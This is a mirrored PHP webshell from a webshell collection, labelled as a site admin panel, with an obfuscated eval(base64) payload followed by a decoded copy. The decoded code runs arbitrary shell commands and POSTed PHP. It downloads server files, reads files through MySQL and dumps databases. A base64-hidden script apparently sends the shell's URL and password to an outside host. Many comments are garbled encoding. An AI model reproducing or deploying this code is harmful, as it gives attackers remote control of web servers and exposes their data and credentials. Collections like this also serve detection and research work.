mirror of
https://github.com/tennc/webshell
synced 2024-11-29 22:50:18 +00:00
2085 lines
123 KiB
Text
2085 lines
123 KiB
Text
|
<?php
|
|||
|
$admin['pass'] = "yyihacker";
|
|||
|
$notice = "::{ Silic Group 黑客作战营 }:: 淫荡插旗组";
|
|||
|
$myneme = "网站后台管理";
|
|||
|
eval(gzuncompress(base64_decode("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
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=======================================decode after http://decode.cnxct.com/ ==================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<?php
|
|||
|
$admin['pass'] = "yyihacker";
|
|||
|
$notice = "::{ Silic Group 黑客作战营 }:: 淫荡插旗组";
|
|||
|
$myneme = "网站后台管理";
|
|||
|
error_reporting(7);
|
|||
|
ob_start();
|
|||
|
$mtime = explode(' ', microtime());
|
|||
|
$starttime = $mtime[1] + $mtime[0];
|
|||
|
@set_time_limit(0);
|
|||
|
//<2F>ǰ<EFBFBD>ȫģʽ<C4A3><CABD><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱȡ<CAB1><C8A1><EFBFBD><EFBFBD>
|
|||
|
/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =====================*/
|
|||
|
// <20>Ƿ<EFBFBD><C7B7><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,1Ϊ<31><CEAA>Ҫ<EFBFBD><D2AA>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊֱ<CEAA>ӽ<EFBFBD><D3BD><EFBFBD>.<2E><><EFBFBD><EFBFBD>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч
|
|||
|
$admin['check'] = "1";
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,<2C><><EFBFBD>ĵ<DEB8>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
|
|||
|
//Ĭ<>϶˿ڱ<CBBF>
|
|||
|
$hidden = "44997";
|
|||
|
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
|
|||
|
//<2F><>ת<EFBFBD>õ<EFBFBD><C3B5><EFBFBD>
|
|||
|
$admin['jumpsecond'] = "1";
|
|||
|
//Ftp<74>ƽ<EFBFBD><C6BD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD>Ӷ˿<D3B6>
|
|||
|
$alexa = "yes";
|
|||
|
//<2F>Ƿ<EFBFBD><C7B7><EFBFBD>ʾalexa<78><61><EFBFBD><EFBFBD><EFBFBD><EFBFBD>yes<65><73><EFBFBD><EFBFBD>no
|
|||
|
$admin['ftpport'] = "21";
|
|||
|
// <20>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD>phpspy<70><79><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>ı༭<C4B1><E0BCAD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>ʱ<EFBFBD><CAB1>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>(yes/no)
|
|||
|
$retime = "no";
|
|||
|
// Ĭ<><C4AC>cmd.exe<78><65>λ<EFBFBD><CEBB>,proc_open<65><6E><EFBFBD><EFBFBD>Ҫʹ<D2AA>õ<EFBFBD>,linuxϵͳ<CFB5><CDB3><EFBFBD><EFBFBD>Ӧ<EFBFBD><EFBFBD>.(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>winntϵͳ<CFB5>ڳ<EFBFBD><DAB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȼ<EFBFBD><C8BB><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8>)
|
|||
|
$cmd = "cmd.exe";
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>phpspy<70><79>ʾ<EFBFBD><CABE>Ȩ<EFBFBD><C8A8><EFBFBD><EFBFBD><EFBFBD>ģ<EFBFBD><C4A3><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD>ܶ<EFBFBD><DCB6><EFBFBD><EFBFBD><EFBFBD><F2B5B1B3><EFBFBD>Ϊ<EFBFBD>ؼ<EFBFBD><D8BC><EFBFBD>ɱ<EFBFBD>ˣ<EFBFBD><CBA3>㺮~~<7E><><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD>ɡ<EFBFBD><C9A1><EFBFBD><EFBFBD>Dz<EFBFBD><C7B2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>~~
|
|||
|
|
|||
|
/*===================== <20><><EFBFBD>ý<EFBFBD><C3BD><EFBFBD> =====================*/
|
|||
|
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
|
|||
|
$serverp = $admin['pass'];
|
|||
|
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
|
|||
|
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
|
|||
|
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
|
|||
|
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
|
|||
|
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
|
|||
|
/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤ =====================*/
|
|||
|
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style=\"font-size: 12px; font-family: Verdana\">ע<><D7A2><EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>˳<EFBFBD><CBB3><EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> >>></a></span>";exit;}
|
|||
|
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
|
|||
|
/*===================== <20><>֤<EFBFBD><D6A4><EFBFBD><EFBFBD> =====================*/
|
|||
|
// <20>ж<EFBFBD> magic_quotes_gpc ״̬
|
|||
|
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
|
|||
|
//mix.dll<6C>Ĵ<EFBFBD><C4B4><EFBFBD>
|
|||
|
$mixdll = "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";
|
|||
|
|
|||
|
function shelL($command){
|
|||
|
global $windows,$disablefunctions;
|
|||
|
$exec = '';$output= '';
|
|||
|
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
|
|||
|
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
|
|||
|
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
|
|||
|
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
|
|||
|
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
|
|||
|
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
|
|||
|
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
|
|||
|
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
|
|||
|
return $exec;
|
|||
|
}
|
|||
|
// <20>鿴PHPINFO
|
|||
|
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() <20><><EFBFBD><EFBFBD><EFBFBD>ѱ<EFBFBD><D1B1><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD>鿴<PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>";exit;
|
|||
|
}if($_GET['action'] == "nowuser") {$user = get_current_user();
|
|||
|
if(!$user) $user = "<22><><EFBFBD>泤<EFBFBD>٣<EFBFBD><D9A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̬<EFBFBD><CCAC><EFBFBD><EFBFBD><DEB7><EFBFBD>ȡ<EFBFBD><C8A1>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>";
|
|||
|
echo"<22><>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>$user";
|
|||
|
exit;
|
|||
|
}
|
|||
|
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit;
|
|||
|
}
|
|||
|
if($action=="mysqldown"){
|
|||
|
$link=@mysql_connect($host,$user,$password);
|
|||
|
if (!$link) {
|
|||
|
$downtmp = '<27><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>: ' . mysql_error();
|
|||
|
}else{
|
|||
|
$query="select load_file('".$filename."');";
|
|||
|
$result = @mysql_query($query, $link);
|
|||
|
if(!$result){
|
|||
|
$downtmp = "<22><>ȡʧ<C8A1>ܣ<EFBFBD><DCA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڻ<EFBFBD><DABB><EFBFBD>ûfileȨ<65>ޡ<EFBFBD><br>".mysql_error();
|
|||
|
}else{
|
|||
|
while ($row = mysql_fetch_array($result)) {
|
|||
|
$filename = basename($filename);
|
|||
|
if($rardown=="yes"){
|
|||
|
$zip = NEW Zip;
|
|||
|
$zipfiles[]=Array("$filename",$row[0]);
|
|||
|
$zip->Add($zipfiles,1);
|
|||
|
$code = $zip->get_file();
|
|||
|
$filename = "".$filename.".rar";
|
|||
|
}else{
|
|||
|
$code = $row[0];
|
|||
|
}
|
|||
|
header("Content-type: application/octet-stream");
|
|||
|
header("Accept-Ranges: bytes");
|
|||
|
header("Accept-Length: ".strlen($code));
|
|||
|
header("Content-Disposition: attachment;filename=$filename");
|
|||
|
echo($code);
|
|||
|
exit;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
// <20><><EFBFBD>ߴ<EFBFBD><DFB4><EFBFBD>
|
|||
|
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b><3E><>ȡ URL <20><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7></b></p></center></body>";exit;
|
|||
|
}
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
|
|||
|
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script>alert('<27><>Ҫ<EFBFBD>µ<EFBFBD><C2B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!')</script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
|
|||
|
}
|
|||
|
// ֱ<><D6B1><EFBFBD><EFBFBD><EFBFBD>ر<EFBFBD><D8B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>
|
|||
|
if ($_POST['backuptype'] == 'download') {
|
|||
|
@mysql_connect($servername,$dbusername,$dbpassword) or die("<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
@mysql_select_db($dbname) or die("ѡ<><D1A1><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
$table = array_flip($_POST['table']);
|
|||
|
$result = mysql_query("SHOW tables");
|
|||
|
echo ($result) ? NULL : "<22><><EFBFBD><EFBFBD>: ".mysql_error();
|
|||
|
|
|||
|
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
|
|||
|
header('Content-type: application/unknown');
|
|||
|
header('Content-Disposition: attachment; filename='.$filename);
|
|||
|
$mysqldata = '';
|
|||
|
while ($currow = mysql_fetch_array($result)) {
|
|||
|
if (isset($table[$currow[0]])) {
|
|||
|
$mysqldata.= sqldumptable($currow[0]);
|
|||
|
$mysqldata.= $mysqldata."\r\n";
|
|||
|
}
|
|||
|
}
|
|||
|
mysql_close();
|
|||
|
exit;
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD>Ŀ¼
|
|||
|
$pathname=str_replace('\\','/',dirname(__FILE__));
|
|||
|
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]);
|
|||
|
|
|||
|
// <20><>ȡ<EFBFBD><C8A1>ǰ·<C7B0><C2B7>
|
|||
|
if (!isset($dir) or empty($dir)) {
|
|||
|
$dir = ".";
|
|||
|
$nowpath = getPath($pathname, $dir);
|
|||
|
} else {
|
|||
|
$dir=$_GET['dir'];
|
|||
|
$nowpath = getPath($pathname, $dir);
|
|||
|
}
|
|||
|
|
|||
|
// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
|
|||
|
$dir_writeable = (dir_writeable($nowpath)) ? "<22><>д" : "<22><><EFBFBD><EFBFBD>д";
|
|||
|
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
|
|||
|
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a>" : "";
|
|||
|
|
|||
|
$tb = new FORMS;
|
|||
|
|
|||
|
?>
|
|||
|
<html>
|
|||
|
<head>
|
|||
|
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
|
|||
|
<style type="text/css">
|
|||
|
body,td{font-size: 12px;background-color:#000000;color:#eee;
|
|||
|
margin: 1px;margin-left:1px;
|
|||
|
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
|
|||
|
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
|
|||
|
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
|
|||
|
SCROLLBAR-TRACK-COLOR: #383838;}
|
|||
|
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
|
|||
|
.smlfont {
|
|||
|
font-family: "Verdana", "Tahoma", "<22><><EFBFBD><EFBFBD>";
|
|||
|
font-size: "11px";
|
|||
|
}
|
|||
|
.INPUT {
|
|||
|
FONT-SIZE: "12px";
|
|||
|
COLOR: "#000000";
|
|||
|
BACKGROUND-COLOR: "#FFFFFF";
|
|||
|
height: "18px";
|
|||
|
border: "1px solid #666666";
|
|||
|
padding-left: "2px";
|
|||
|
}
|
|||
|
.redfont {COLOR: "#CA0000";}
|
|||
|
|
|||
|
.top {BACKGROUND-COLOR: "#CCCCCC"}
|
|||
|
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
|
|||
|
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
|
|||
|
</style>
|
|||
|
<SCRIPT language=JavaScript>
|
|||
|
function CheckAll(form) {
|
|||
|
for (var i=0;i<form.elements.length;i++) {
|
|||
|
var e = form.elements[i];
|
|||
|
if (e.name != 'chkall')
|
|||
|
e.checked = form.chkall.checked; }}
|
|||
|
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}}
|
|||
|
</SCRIPT>
|
|||
|
</head>
|
|||
|
<title><?php echo"$myneme"?></title>
|
|||
|
